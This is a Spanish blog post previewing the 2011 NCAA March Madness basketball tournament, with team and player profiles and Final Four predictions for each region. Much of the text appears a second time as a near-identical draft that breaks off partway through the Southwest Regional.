March Madness 2011

17 de March de 2011 por kantonyo

Llega el momento más esperado del año en la temporada universitaria. Entre el 15 de marzo y el 4 de abril se disputa la competición más frenética que existe en el deporte de élite con 67 partidos que decidirán el campeón final de la National Collegiate Athletic Association (NCAA) en su sección de baloncesto masculino. Son grandes los momentos que nos ha dejado para la historia el March Madness, duelos irrepetibles, hazañas imposibles etc…, pero lo más valioso sin duda es la gran cantidad y calidad de talentos que ha nutrido este torneo al baloncesto profesional. Tras la temporada regular y los torneos de conferencia, los 68 equipos clasificados se verán las caras en eliminatorias a vida o muerte organizados en cuatro grupos regionales. La Final Four celebrada en el Reliant Stadium (NFL) de Houston decidirá el campeón final entre estos cuatro finalistas. Como en otros años recomendamos seguir la competición en HD totalmente gratuito por la web oficial http://mmod.ncaa.com/ tanto de los partidos en directo, highlights o en diferido.

East RegionaL (Newark, NJ)

Los Buckeyes de Ohio State no han notado para nada el salto de Evan Turner a la NBA y han conseguido ser la mejor universidad en el ranking AP, además de conseguir el título del torneo de la conferencia Big Ten. El ala-pívot Jared Sullinger será la referencia en el poste alto. Ha promediado 17 puntos y 10 rebotes en su primer año y es uno de los favoritos a alcanzar el número 1 del draft. El perímetro de Ohio State es muy potente, con los escoltas William Buford, David Lighty y el base Aaron Craft, pero pueden notar la carencia de un pívot dominante en el rebote. En su primer partido no deben tener problemas contra UTSA, donde el base Melvin Johnson es su jugador más peligroso. Si no hay sorpresas más adelante se verán las caras contra el ganador del encuentro entre George Mason y Villanova. Los Wildcats de Villanova llevan una racha desastrosa con cinco derrotas consecutivas que a punto han estado de dejarles fuera del March Madness, por lo que llegan al torneo en muy mal momento. Por su parte, los Patriots de George Mason intentaran repetir la machada del 2006 donde llegaron a alcanzar la Final Four contra todo pronóstico. Vienen de hacer una buena temporada a pesar de perder la final de su conferencia.

Tras la marcha de John Wall, DeMarcus Cousin, Eric Bledsoe, Patrick Patterson y Daniel Orton, los Wildcats de Kentucky se han tenido que renovar profundamente con jugadores de primer año. Empezaron la temporada muy irregulares, incluyendo la noticia que impedía al joven talento turco Enes Kanter disputar la competición, pero llegan al torneo como un equipo fuerte y talentoso, como se vio en el campeonato de la conferencia SEC, en el que se proclamaron campeones. Habrá que seguir la pista del alero Terrence Jones y del base Brandon Knight, aspirantes a top 10 del draft. Al igual que el año pasado, su éxito en el torneo dependerá mucho de la madurez de sus jóvenes jugadores. No lo tendrán del todo fácil en su primer partido contra la elitista Princeton. Los Tigers han conseguido ganar la Ivy League y la historia nos dice que suelen ser equipos muy rocosos y técnicos. El ganador se cruzará con la eliminatoria entre West Virginia y Clemson. Los Mountaineers tendrán complicado igualar la gesta del año pasado llegando a la Final Four tras la pérdida de Dasean Butler y Devin Ebanks. En frente, los Tigers de Clemson serán un complicado rival. El ala-pívot Jerei Grant ha terminado la temporada a un buen nivel y estará arropado de un gran tirador como es el base Demontez Stitt.

Syracuse Orange ha tenido dos caras esta temporada. Empezó en una forma fantástica, con un balance 18-0 en los primeros partidos disputados, pero a partir de mediados de enero entró en una racha negativa de la cual se ha estado recuperando en las últimas semanas. Posee una de las plantillas más completas, con el pívot Rick Jackson dominando la pintura, Kris Joseph de especialista anotador y Scoop Jardine dirigiendo el juego. En su primer partido contra Indiana State no debe pasar apuros pero tendrá una dura prueba de fuego ante el vencedor del Xavier-Marquette. Los Musketeers de Xavier han dominado la liga regular de la Atlantic 10 Conference pero tuvieron un traspiés en el torneo y cayeron eliminados contra la débil Dayton. El base Tu Holloway, con 20 puntos de media, y su potente juego interior serán las armas de este conjunto que lleva tres años consecutivos clasificándose para el Sweet 16. Los Golden Eagles de Marquette, a pesar de un año muy irregular, han conseguido grandes victorias contra rivales importantes como Notre Dame, Syracuse o Uconn. Los forward Jimmy Butler y Jae Crowder son la referencia en ataque, con la ayuda del escolta Darius Johnson-Odom.

Por su parte, los Tar Heels de North Carolina vuelven al gran baile después de la ausencia del año pasado, donde no pudieron subsistir a las bajas de algunos jugadores a la NBA como Tyler Hansbrough, Wayne Ellington o Ty Lawson. Este año la gran atracción es el escolta de primer año Harrison Barnes. Después de un comienzo de temporada decepcionante, en las últimas fases de la liga regular y en el torneo de la ACC ha dado muestras de su talento con actuaciones importantes como los 40 puntos contra Clemson en las semifinales. El juego interior de UNC es uno de los más potentes del país con Tyler Zeller y John Henson. También hay que destacar la gran progresión que ha tenido el base de primer año Kendall Marshall. North Carolina tendrá una cómoda eliminatoria contra Long Island y se cruzará contra Washington o Georgia. Los Huskies de Washington han dado la campanada con su título de la Pacific-10 venciendo a Arizona. El base Isaiah Thomas fue fundamental en este partido con 28 puntos y 7 asistencias. La gran sorpresa de la temporada ha sido el rendimiento del ala-pívot Mattew Bryan-Amaning, con 16 puntos y 8 rebotes. En los Bulldogs de Georgia destaca especialmente el ala-pívot de tercer año Trey Thompkins, aspirante a primera ronda del draft, y el escolta Travis Leslie.

Pronóstico:

Semifinales regionales: Ohio State vs Kentucky / Syracuse vs North Carolina
Clasificado para la Final Four: North Carolina.

West Regional (Anaheim, CA)

Duke, actual campeón de la competición, ha mantenido practicamente el bloque del año pasado con la excepción de Jon Scheyer y Brian Zoubek, y por lo tanto, su gran nivel. Nolan Smith, en su cuarto y último año, ha dado un salto de calidad tremendo y se ha convertido, con el permiso de Kyle Singler, en el alma de los Blue Devils. A pesar de no ser los primeros de la regular season en la Atlantic Coast, consiguieron un brillante triunfo contra su eterno rival, los Tar Heels de North Carolina, en la final del torneo por 17 puntos de ventaja, y han conseguido situarse como tercer equipo del año. La duda surge en la pintura, donde los Blue Devils no han encontrado un sustituto de garantías a Zoubek y tienen muchos problemas en la captura de rebotes. Aunque la mala noticia del año en Duke fue la grave lesión del base Kyrie Irving, máximo candidato a principios de temporada al número uno del draft. El primer partido les enfrentará a la modesta Hampton Pirates y lo más probable es que se crucen contra el vencedor del Michigan-Tennessee. La Universidad de Michigan, una de las más fuertes económicamente de Estados Unidos, aspira a volver a la elite a la que pertenecía a principios de los noventa. Disponen de un equipo joven, con el base de segundo año, Darius Morris, como jugador más importante en ataque y acompañado en el perímetro por el hijo de Tim Hardaway. Tim Jr ha conseguido en su primer año 14 puntos, 4 rebotes y 2 asistencias de media. Además, el ala-pívot freshman Jordan Morgan ha demostrado buenas maneras en los pocos minutos disfrutados. En frente, los Volunteers tendrán muy complicado llegar al Elite 8, como hicieron el año pasado. El escolta Scootty Hopson continúa con su gran progresión y este año ha promediado 17 puntos. Tobias Harris, ala-pívot de primer año, no ha defraudado en su primera temporada y suena como primera ronda en el draft.

En este momento el número 1 en algunos mockdraft es Derrick Williams, ala-pívot de los Wildcats de Arizona. Derrick es un portento físico al estilo de Blake Griffin. Destaca por su capacidad de matar en la pintura y su carácter defensivo y es, además, un buen tirador de media y larga distancia, como ha demostrado con un 60% (35/58) en tiros de tres puntos. Su talento ha llevado a Arizona a niveles hace tiempo olvidados en Tucson. Los Wildcats han tenido una temporada muy digna a pesar de la derrota frente Washington en la final de la Pac-10, cuando lo tenían todo a favor. Arizona y Derrick han tenido mala suerte en los cruces. A las primeras de cambio se tendrán que enfrentar contra los Tigers de Memphis. En los últimos años jugadores como Derrick Rose, Tyreke Evans o Elliot Williams han salido de Memphis. Esta temporada se han conseguido clasificar en el último momento con el triunfo en el torneo de la USA Conference tras una temporada más floja que las anteriores gracias en buena parte al escolta de primer año, Will Barton. El que se lleve la eliminatoria entre Memphis y Arizona se las verá con el vencedor del Texas-Oakland. Los Longhorns han estado a remolque de Kansas este año en la Big 12, con doble subcampeonato. Los aleros Jordan Hamilton y Tristan Thompson llevan la batuta este año en Texas. Jordan ha promediado casi 19 puntos y 8 rebotes por partido, y Tristan, de primer año, es un especialista defensivo en el poste alto.

Kemba Walker es el jugador de moda en estos instantes en la NCAA. El base de UConn ha conseguido llevar a su universidad al título de campeones de la Big East después de semanas a la deriva donde los Huskies llevaban un balance de 4-7 y donde estuvieron en serios problemas para clasificarse al torneo final. Walker, después de un primer año en la universidad muy prometedor junto a Hasheem Thabeet, tuvo muchos problemas el año pasado, cuando le concedieron el mando del equipo. Este año, en cambio, ha dado un salto de calidad tremendo y promediado 23 puntos, 5 rebotes y 4 asistencias. En el torneo final de la Big East ha ofrecido actuaciones de escándalo, con promedios de 30 puntos, y eliminando a equipos como Georgetown, Pitts, Syracuse o Louisville en la final. El pívot de segundo año Alex Oriakhi, que promedia casi 9 rebotes, y el joven escolta Jeremy Lamb son otros jugadores destacados en Connecticut. Los Huskies han tenido suerte en el sorteo. En primera ronda se encontrarán a la modesta Bucknell y si todo ocurre como se espera tendrán que derrotar al ganador del Cincinnati-Missouri. Los Bearcats de Cincinnati empezaron con un balance 15-0 pero se fueron diluyendo según avanzaba la temporada. Finalmente, consiguieron entrar después de cinco años de ausencia. Destaca el ala-pívot de tercer año Yancy Gates, que suena para los últimos puestos de la segunda ronda del draft. Por su parte, Missouri dispone de un buen escolta como Marcus Denmon y dos ala-pívots muy interesantes como Laurence Bowers y el novato Ricardo Ratliffe.

Los Aztecas de San Diego State han tenido una temporada casi perfecta, con un balance de 32-2 (las dos derrotas contra Brigham Young) y se han llevado el doble título de la Mountain West. El alero Kawhi Leonard ha sido la gran atracción del año con 15 puntos y 11 rebotes gracias a su compromiso e inteligencia en la pista. Leonard apunta a top 15 del próximo draft y podría subir escalones si demuestra su rendimiento contra equipos de conferencias más importantes. El primer partido será contra la modesta Northern Colorado, cuyo principal jugador es el base Devon Beitzel. Más tarde deberían enfrentarse al vencedor del Temple-Penn State. Los Owls de Temple son un clásico en el March Madness. Este año han conseguido juntar un equipo sólido y experto y han conseguido un balance muy meritorio de 25-7 para quedarse a las puertas del título en la Atlantic 10. A priori, Penn State será favorito frente Temple. Los Nittany Lions confían en el gran anotador Talor Battle, que ha promediado 20 puntos, y en el ala-pívot Jeff Brooks. Ambos son jugadores de cuarto año.

Pronóstico:

Semifinales regionales: Duke vs Arizona / UConn vs San Diego St
Clasificado para la Final Four: Duke

Southwest Regional (San Antonio, TX)

La Universidad de Kansas vuelve a ser cabeza de cartel después de un año en el que ha dominado por completo la difícil Big 12 para ser el segundo mejor equipo del país en el Ranking AP. Los hermanos Marcus y Markieff Morris son la principal baza de los Jayhawks. Los dos ala-pívots se compenetran a la perfección y además están ayudados en la pintura por Thomas Robinson. El freshman Josh Selby, uno de los más importantes recruits del High School de este año, no ha aportado todo lo que se le presupone en la temporada regular, por lo que tendrá una ocasión única de resarcirse y mostrar su verdadero talento. Boston University no debe ser rival para Kansas, por lo que su primer obstáculo serio será el ganador del UNLV-Illinois. La Universidad de Nevada en Las Vegas ha sido el convidado de piedra en el duelo BYU-San Diego State en la Mountain West. Los Rebels no han podido hacerse con la victoria en ningún enfrentamiento entre ambos. Illinois, por su parte, llega al March Madness sin haber demostrado mucho en la temporada regular. Su punto fuerte es el juego interior, con Mike Davis y Mike Tisdale. Además, el base Demetri McCamey es aspirante a segunda ronda del draft de este año.

Los Cardinals de Louisville llegan al torneo final tras perder en la final del Big East contra UConn. Tienen una de las plantillas más extensas del torneo. En la pintura el pívot Terrence Jennings y el ala-pívot novato Gorgui Dieng son la referencia. Y en el perímetro, el escolta Pestron Knowles es su máximo anotador y además cuenta con los bases Kyle Kuric y Peyton Siva. También ha dejado buenas sensaciones el alero Rakeem Buckles pero no ha contado con muchos minutos. Louisville ha tenido mala suerte en su primer enfrentamiento, ya que se tendrá que ver las caras con una de las atracciones individuales del torneo, el ala-pívot Kenneth Faried, aspirante a top 20 del draft. Faried es un gran atleta y destaca por su poder defensivo. En su cuarto año ha promediado 18 puntos y casi 15 rebotes, máximo reboteador del año. El ganador se enfrentará al vencedor del Vanderbilt-Richmond. Los Commodores de Vanderbilt han obtenido su clasificación gracias a victorias contra rivales importantes como North Carolina, Marquette o Kentucky. El escolta tirador John Jenkins, en su segundo año, ha dado un salto cualitativo y ha llegado a promediar 20 puntos con un 40% en tiros de 3. El alero Jeffery Taylor es otro jugador importante en Vanderbilt. Richmond dio la campanada con el título de la Atlantic 10 contra todo pronóstico. El ala-pívot Justin Harper, que promedia 18 puntos y 7 rebotes, y el base Kevin Anderson son los jugadores más destacados de los Spiders.

Los Boilermakers de Purdue volvieron a perder a Robbie Hummel por lesión esta temporada pero, aun así, han vuelto estar en lo más alto del ranking del país, en el puesto 13. JaJuan Johnson mejora año tras año y ha promediado 21 puntos y 8 rebotes. El escolta E’Twaun Moore, en su último año en la universidad, también ha tenido una actuación destacada, con partidos meritorios como los 38 puntos en la victoria contra Ohio State (#1). No deberá haber problemas contra Saint Peters Peacocks y se cruzarán con el emparejamiento entre Georgetown y VCU. Los Hoyas de Georgetown, como ha pasado en los últimos años, han sido muy irregulares. En los últimos partidos tienen un balance de 1-5 en contra. Austin Freeman, escolta de cuarto año, es el máximo anotador con 18 puntos. Virginia Commonwealth se ha metido desde la preliminar contra USC gracias al buen partido del ala-pívot Jamie Skeen, que ha promediado 15 puntos y 8 rebotes.

Ben Hansbrough, hermano de Tyler (Indiana Pacers) y jugador de Notre Dame, ha sido la gran sorpresa de la conferencia Big East. Ben ha llevado a Notre Dame a cotas más altas de lo que consiguió Luke Harangody. Promedia 18 puntos, 4 rebotes y 4 asistencias con un 44% en tiros de 3. Notre Dame ha formado una buena plantilla en la que también hacen un buen papel los aleros Carleton Scott y Tim Abromaitis. Les espera una eliminatoria cómoda contra los Zips de Akron y más adelante esperarán rival del duelo Texas A&M-Florida State. Los Aggies de Texas A&M han tenido una meritoria temporada, con semifinales en el torneo Big 12. Los aleros Krhis Middleton y Nathan Walkup son la principal arma de un quinteto muy fuerte físicamente. En frente, los Seminoles de Florida State estarán muy pendientes de la posible vuelta de Chris Singleton tras la lesión que le ha dejado en el dique seco los últimos seis partidos, en los que el equipo ha notado demasiado su baja. El ala-pívot de primer año Bernard James ha sido su sustituto y, a pesar de su poca experiencia, ha dejado buenas sensaciones.

Pronóstico:

Semifinales regionales: Kansas vs Louisville / Purdue vs Notre Dame
Clasificado para la Final Four: Kansas

Southeast Regional (New Orleans, LA)

Los Panthers de Pittsburgh son el único cabeza de serie que no ha ganado el torneo de su conferencia. Pitts se vio sorprendida por el partidazo de Kemba Walker, que los dejó en la cuneta tras haber quedado campeones de la liga regular de la Big East con un balance total de 27-5. Los Panthers tienen una plantilla muy experta, extensa y completa, en la que destacan los escoltas Gilbert Brown, Brad Wanamaker, el pívot Gary McGhee o el base Ashton Gibbs. No se espera mucha resistencia en su primer partido contra North Carolina-Asheville y lo más probable es que su primer partido en serio sea frente el vencedor del Butler-Old Dominion. Los Bulldogs fueron el año pasado la gran atracción del torneo y estuvieron a punto de dar la campanada en la final contra Duke. Sin embargo, la marcha de Gordon Hayward a Utah será un lastre muy difícil de superar. El base Shelvin Mack continúa con su progresión y será muy importante, como demostró el año pasado. El poste alto también estará bien representado con Matt Howard y Andrew Smith. A pesar de ser octava cabeza de serie, ha tenido suerte en su emparejamiento con Old Dominion. Los de Virginia han sido campeones por segundo año consecutivo en su conferencia, en la que Frank Hassell, ala-pívot de cuarto año, ha sido un jugador muy determinante.

El tercer puesto en la liga regular de la difícil conferencia Big Ten ha aupado a los Badgers de Wisconsin al puesto 16 del Ranking AP y su clasificación al March Madness. El trío que forman el ala-pívot Jon Leuer, que promedia 19 puntos, el base Jordan Taylor, que asiste 5 balones por partido, y el alero Keaton Nankivil es la columna vertebral de un equipo con grandes aspiraciones pero con muy poca mentalidad y criterio, como se pudo comprobar en la paliza que les endosó Ohio State (65-93) o el descalabro que sufrieron frente Penn State (33-36). Deberán tener cuidado con los campeones de la Atlantic Sun, los Bruins de Belmont, que han conseguido un balance de 30-4 y dominado absolutamente la conferencia. En la otra eliminatoria, Kansas State tendrá que jugársela contra Utah State. Los Wildcats de Kansas State han terminado cuartos del Big 12. El escolta Jacon Pullen es, con 20 puntos por partido, su jugador más determinante y aparece en algunos mockdraft como posible segunda ronda. Los Aggies de Utah State, por su parte, han ganado tanto la regular season como el torneo de postemporada de la WAC Conference y gracias al balance de 30-3 se han situado en el puesto 19 del Ranking. También es cierto que en sus dos enfrentamientos contra equipos del March Madness han salido derrotados. Un año más, el alero Tai Wesley ha sido su mejor jugador, con promedios de 15 puntos y 8 rebotes.

Este parece ser el año de los Cougars de Brigham Young. Han conseguido compartir el título de la liga regular en la conferencia Mountain West con San Diego State, aunque perdieran la final del torneo contra estos mismos. Sin duda, su jugador más importante es el base Jimmer Fredette, mejor anotador del año con 28,5 puntos por partido. Destaca su mejor partido de 52 puntos frente New Mexico en las semifinales de conferencia. Jimmer opta por el momento a top 10 del próximo draft. El partido contra Wofford a priori será un mero trámite y se jugarán el pase al Sweet 16 contra el ganador del St John’s-Gonzaga. Los Red Storm de Saint John’s consiguen después de nueve años entrar en el torneo final de la NCAA. Han completado una temporada muy seria con victorias ante Duke, UConn, Marquette, Pittsburgh, Villanova o Notre Dame. DJ Kennedy, alero de cuarto año, el alero Justin Brownlee y el base Dwight Hardy forman la columna vertebral. Gonzaga ha conseguido entrar en el torneo gracias a su victoria en la final de la West Coast ante Saint Mary’s. El pívot Robert Sacre y el alero Elias Harris son sus jugadores más destacados.

Por último en la última parte del cuadro, los Florida Gators llegan tras perder la final de la SEC Conference contra Kentucky después de dominar con facilidad la conferencia. Chandler Parsons, alero de cuarto año, el base Ervin Walker y el escolta Kenny Boynton dan forma a una plantilla muy sólida. Los Gators no tenían tantas aspiraciones de llegar a la Final Four desde que fueron campeones en 2007 con Brewer, Horford y Noah. Se estrenarán contra la Universidad de California en Santa Barbara en un partido en el que no deben tener problemas, y más tarde se podrán cruzar contra el ganador del Michigan State – UCLA. El equipo de Tom Izzo, sorprendiendo año tras año, ha conseguido estar en la Final Four dos años consecutivos. Kalin Lucas vuelve a ser un año más el jugador más importante, con 17 puntos. Los Bruins de UCLA vuelven tras un año fuera del March Madness gracias al subcampeonato de la regular season en la Pacific 10. El escolta Tyler Honeycutt, que promedia 13 puntos y 7 rebotes, está subiendo como la espuma en los mockdraft, donde ya le sitúan en top 15. También el base Malcolm Lee puede entrar en segunda ronda del draft.

Pronóstico:

Semifinales regionales: Butler vs Wisconsin / BYU vs Florida
Clasificado para la Final Four: BYU

Llega el momento más esperado del año en la temporada universitaria. Entre el 15 de marzo y el 4 de abril se disputa la competición más frenética que existe en el deporte de élite con 67 partidos que decidiran el campeón final de la National Collegiate Athletic Association (NCAA) en su sección de baloncesto masculino. Son grandes los momentos que nos ha dejado para la historia el March Madness, duelos irrepetibles, hazañas imposibles etc…, pero lo más valioso sin duda es la gran cantidad y calidad de talentos que ha nutrido este torneo al baloncesto profesional. Tras la temporada regular y los torneos de conferencia, los 68 equipos clasificados se veran las caras en eliminatorias a vida o muerte organizados en cuatro grupos regionales. La Final Four celebrada en el Reliant Stadium (NFL) de Houston decidirá el campéon final entre estos cuatro finalistas. Como en otros años recomendamos seguir la competición en HD totalmente gratuito por la web oficial http://mmod.ncaa.com/ tanto de los partidos en directo, highlights o en diferido.

East RegionaL (Newark, NJ)

Los Buckeyes de Ohio State no han notado para nada el salto de Evan Turner a la NBA y han conseguido ser la mejor universidad en el ranking AP, consiguiendo además el título del torneo de la conferencia Big Ten. El alapívot Jared Sullinger será la referencia en el poste alto. Ha promediado 17 puntos y 10 rebotes en su primer año y es uno de los favoritos a alcanzar el número 1 del draft. El perímetro de Ohio State es muy potente con los escoltas William Buford, David Lighty y el base Aaron Craft pero pueden notar la carencia de un pívot dominante en el rebote. En su primer partido no deben tener problemas contra UTSA donde el base Melvin Johnson es su jugador más peligroso. Si no hay sorpresas más adelante se verán las caras contra el ganador del encuentro entre George Mason y Villanova. Los Wildcats de Villanova llevan una racha desastrosa con cinco derrotas consecutivas que a punto han estado de dejarles fuera del March Madness por lo que llegan al torneo en muy mal momento. Por su parte los Patriots de George Mason intentaran repetir la machada del 2006 donde llegaron a alcanzar la Final Four contra todo pronóstico. Vienen de hacer una buena temporada a pesar de perder la final de su conferencia.

Tras la marcha de John Wall, DeMarcus Cousin, Eric Bledsoe, Patrick Patterson y Daniel Orton, los Wildcats de Kentucky se han tenido que renovar profundamente con jugadores de primer año. Empezaron la temporada muy irregulares, incluyendo la noticia que impedía al joven talento turco Enes Kanter disputar la competición, pero llegan al torneo como un equipo fuerte y talentoso como se vio en el campeonato de la conferencia SEC en el que se proclamaron campeones. Habrá que seguir la pista del alero Terrence Jones y del base Brandon Knight, aspirantes a top 10 del draft. Al igual que el año pasado su éxito en el torneo dependerá mucho de la madurez de sus jóvenes jugadores. No lo tendrán del todo fácil en su primer partido contra la elitista Princeton. Los Tigers han conseguido ganar la Ivy League y la historia nos dice que suelen ser equipos muy rocosos y técnicos. El ganador se cruzara con la eliminatoria entre West Virginia y Clemson. Los Mountaineers tendrán complicado igualar la gesta del año pasado llegando a la Final Four tras la pérdida de Dasean Butler y Devin Ebanks. En frente los Tigers de Clemson serán un complicado rival. El alapívot Jerei Grant ha terminado la temporada a un buen nivel y estará arropado de un gran tirador como es el base Demontez Stitt.

Syracuse Orange ha tenido dos caras esta temporada. Empezó en una forma fantástica con un balance 18-0 en los primeros partidos disputados pero a partir de mediados de enero entró en una racha negativa de la cual se ha estado recuperando en las últimas semanas. Posee una de las plantillas más completas, con el pívot Rick Jackson dominando la pintura, Kris Joseph de especialista anotador y Scoop Jardine dirigiendo el juego. En su primer partido contra Indiana State no debe pasar apuros pero tendrá una dura prueba de fuego ante el vencedor del Xavier-Marquette. Los Musketeers de Xavier han dominado la liga regular de la Atlantic 10 Conference pero tuvieron un traspies en el torneo cayendo eliminados contra la débil Dayton. El base Tu Holloway con 20 puntos de media y su potente juego interior serán las armas de este conjunto que lleva tres años consecutivos clasificándose para el Sweet 16. Los Golden Eagles de Marquette a pesar de un año muy irregular han conseguido grandes victorias contra rivales importantes como Notre Dame, Syracuse o Uconn. Los forward Jimmy Butler y Jae Crowder son la referencia en ataque con la ayuda del escolta Darius Johnson-Odom.

Por su parte, los Tar Heels de North Carolina vuelven al gran baile después de la ausencia del año pasado donde no pudieron subsistir a las bajas de algunos jugadores a la NBA como Tyler Hansbrough, Wayne Ellington o Ty Lawson. Este año la gran atracción es el escolta de primer año Harrison Barnes. Después de un comienzo de temporada decepcionante, en las últimas fases de la liga regular y en el torneo de la ACC ha dado muestras de su talento con actuaciones importantes como los 40 puntos contra Clemson en las semifinales. El juego interior de UNC es uno de los más potentes del país con Tyler Zeller y John Henson. También hay que destacar la gran progresión que ha tenido el base de primer año Kendall Marshall. North Carolina tendrá una cómoda eliminatoria contra Long Island y se cruzará contra Washington o Georgia. Los Huskies de Washington han dado la campanada con su título de la Pacific-10 venciendo a Arizona. El base Isaiah Thomas fue fundamental en este partido con 28 puntos y 7 asistencias. La gran sorpresa de la temporada ha sido el rendimiento del alapívot Mattew Bryan-Amaning con 16 puntos y 8 rebotes. En los Bulldogs de Georgia destaca especialmente el alapívot de tercer año Trey Thompkins aspirante a primera ronda del draft y el escolta Travis Leslie.

Pronóstico:

Semifinales regionales: Ohio State vs Kentucky / Syracuse vs North Carolina
Clasificado para la Final Four: North Carolina.

West Regional (Anaheim, CA)

Duke, actual campeón de la competición, ha mantenido practicamente el bloque del año pasado con la excepción de Jon Scheyer y Brian Zoubek y por lo tanto su gran nivel. Nolan Smith en su cuarto y último año ha dado un salto de calidad tremendo y se ha convertido con el permiso de Kyle Singler en el alma de los Blue Devils. A pesar de no ser los primeros de la regular season en la Atlantic Coast consiguieron un brillante triunfo contra su eterno rival, los Tar Heels de North Carolina, en la final del torneo por 17 puntos de ventaja y han conseguido situarse como tercer equipo del año. La duda surge en la pintura, donde los Blue Devils no han encontrado un sustituto de garantías a Zoubek y tienen muchos problemas en la captura de rebotes. Aunque la mala noticia del año en Duke fue la grave lesión del base Kyrie Irving, máximo candidato a principios de temporada al número uno del draft. El primer partido les enfrentará a la modesta Hampton Pirates y lo más probable es que se crucen contra el vencedor del Michigan-Tennessee. La Universidad de Michigan, una de las más fuertes económicamente de Estados Unidos aspira a volver a la elite a la que pertenecía a principios de los noventa. Disponen de un equipo joven, con el base de segundo año, Darius Morris como jugador más importante en ataque y acompañado en el perímetro del hijo de Tim Hardaway. Tim Jr ha conseguido en su primer año 14 puntos, 4 rebotes y 2 asistencias de media. Además, el alapívot freshman Jordan Morgan ha demostrado buenas maneras en los pocos minutos disfrutados. En frente, los Volunteers tendrán muy complicado llegar al Elite 8 como hicieron el año pasado. El escolta Scootty Hopson continúa con su gran progresión y este año ha promediado 17 puntos. Tobias Harris, alapívot de primer año no ha defraudado en su primera temporada y suena como primera ronda en el draft.

En este momento el número 1 en algunos mockdraft es Derrick Williams, alapívot de los Wildcats de Arizona. Derrick es un portento físico al estilo de Blake Griffin. Destaca por su capacidad de matar en la pintura y su carácter defensivo y es, además, un buen tirador de media y larga distancia como ha demostrado con un 60% (35/58) en tiros de tres puntos. Su talento ha llevado a Arizona a niveles hace tiempo olvidados en Tucson. Los Wildcats han tenido una temporada muy digna a pesar de la derrota frente Washington en la final de la Pac-10 cuando lo tenían todo a favor. Arizona y Derrick han tenido mala suerte en los cruces. A las primeras de cambio se tendrán que enfrentar contra los Tigers de Memphis. En los últimos años jugadores como Derrick Rose, Tyreke Evans o Elliot Williams han salido de Memphis. Esta temporada se han conseguido clasificar en el último momento con el triunfo en el torneo de la USA Conference tras una temporada más floja que las anteriores gracias en buena parte al escolta de primer año, Will Barton. El que se lleve la eliminatoria entre Memphis y Arizona se las verá con el vencedor del Texas-Oakland. Los Longhorns han estado a remolque de Kansas este año en la Big 12, con doble subcampeonato. Los aleros Jordan Hamilton y Tristan Thompson llevan la batuta este año en Texas. Jordan ha promediado casi 19 puntos por partido y 8 rebotes y Tristan, de primer año, es un especialista defensivo en el poste alto.

Kemba Walker es el jugador de moda en estos instantes en la NCAA. El base de UConn ha conseguido llevar a su universidad al título de campeones de la Big East después de semanas a la deriva donde los Huskies llevaban un balance de 4-7 y donde estuvieron en serios problemas para clasificarse al torneo final. Walker, después de un primer año en la universidad muy prometedor junto a Hasheem Thabeet, tuvo muchos problemas el año pasado cuando le concedieron el mando del equipo. Este año, en cambio, ha dado un salto de calidad tremendo promediando 23 puntos, 5 rebotes y 4 asistencias. En el torneo final de la Big East ha ofrecido actuaciones de escándalo promediando 30 puntos y eliminando a equipos como Georgetown, Pitts, Syracuse o Louisville en la final. El pívot de segundo año, Alex Oriakhi que promedia casi 9 rebotes y el joven escolta Jeremy Lamb son otros jugadores destacados en Connecticut. Los Huskies han tenido suerte en el sorteo. En primera ronda se encontrarán a la modesta Bucknell y si todo ocurre como se espera tendrán que derrotar al ganador del Cincinnati-Missouri. Los Bearcats de Cincinnati empezaron con un balance 15-0 pero se fueron diluyendo según avanzaba la temporada. Finalmente, consiguieron entrar después de cinco años de ausencia. Destaca el alapívot de tercer año Yancy Gates que suena para los últimos puestos de la segunda ronda del draft. Por su parte, Missouri dispone de un buen escolta como Marcus Denmon y dos alapívots muy interesantes como Laurence Bowers y el novato Ricardo Ratliffe.

Los Aztecas de San Diego State han tenido una temporada casi perfecta con un balance de 32-2 (las dos derrotas contra Brigham Young) y se han llevado el doble título de la Mountain West. El alero Kawhi Leonard ha sido la gran atracción del año con 15 puntos y 11 rebotes gracias a su compromiso e inteligencia en la pista. Leonard apunta a top 15 del próximo draft y podría subir escalones si demuestra su rendimiento contra equipos de conferencias más importantes. El primer partido será contra la modesta Northern Colorado donde su principal jugador es el base Devon Beitzel. Más tarde deberían enfrentarse al vencedor del Temple-Penn State. Los Owls de Temple son un clásico en el March Madness. Este año han conseguido juntar un equipo sólido y experto y han conseguido un balance muy meritorio de 25-7 quedándose a las puertas del título en la Atlantic 10. A priori, Penn State será favorito frente Temple. Los Nittany Lions confían en el gran anotador Talor Battle que ha promediado 20 puntos y en el alapívot Jeff Brooks. Ambos son jugadores de cuarto año.

Pronóstico:

Semifinales regionales: Duke vs Arizona / UConn vs San Diego St
Clasificado para la Final Four: Duke

Southwest Regional (San Antonio, TX)

La Universidad de Kansas vuelve un año más a ser cabeza de cartel después de un año donde ha dominado por completo la difícil Big 12 consiguiendo ser el segundo mejor equipo del país en el Ranking AP. Los hermanos Marcus y Markieff Morris son la principal baza de los Jayhawks. Los dos alapívots se compenetran a la perfección y además están ayudados en la pintura por Thomas Robinson. El freshman Josh Selby, uno de los más importantes recruits del High School de este año, no ha dado todo lo que se le presupone en la temporada regular por lo que tendrá una ocasión única de resarcirse y mostrar su verdadero talento. Boston University no debe ser rival para Kansas por lo que su primer obstáculo serio será contra el ganador del UNLV-Illinois. La Universidad de Nevada en Las Vegas ha sido el convidado de piedra en el duelo BYU-San Diego State en la Mountain West. Los Rebels no han podido hacerse con la victoria en ningún enfrentamiento contra ambos. Illinois, por su parte, llega al March Madness sin haber demostrado mucho en la temporada regular y donde su punto fuerte en el juego interior con Mike Davis y Mike Tisdale. Además, el base Demetri McCamey es aspirante a segunda ronda del draft de este año.

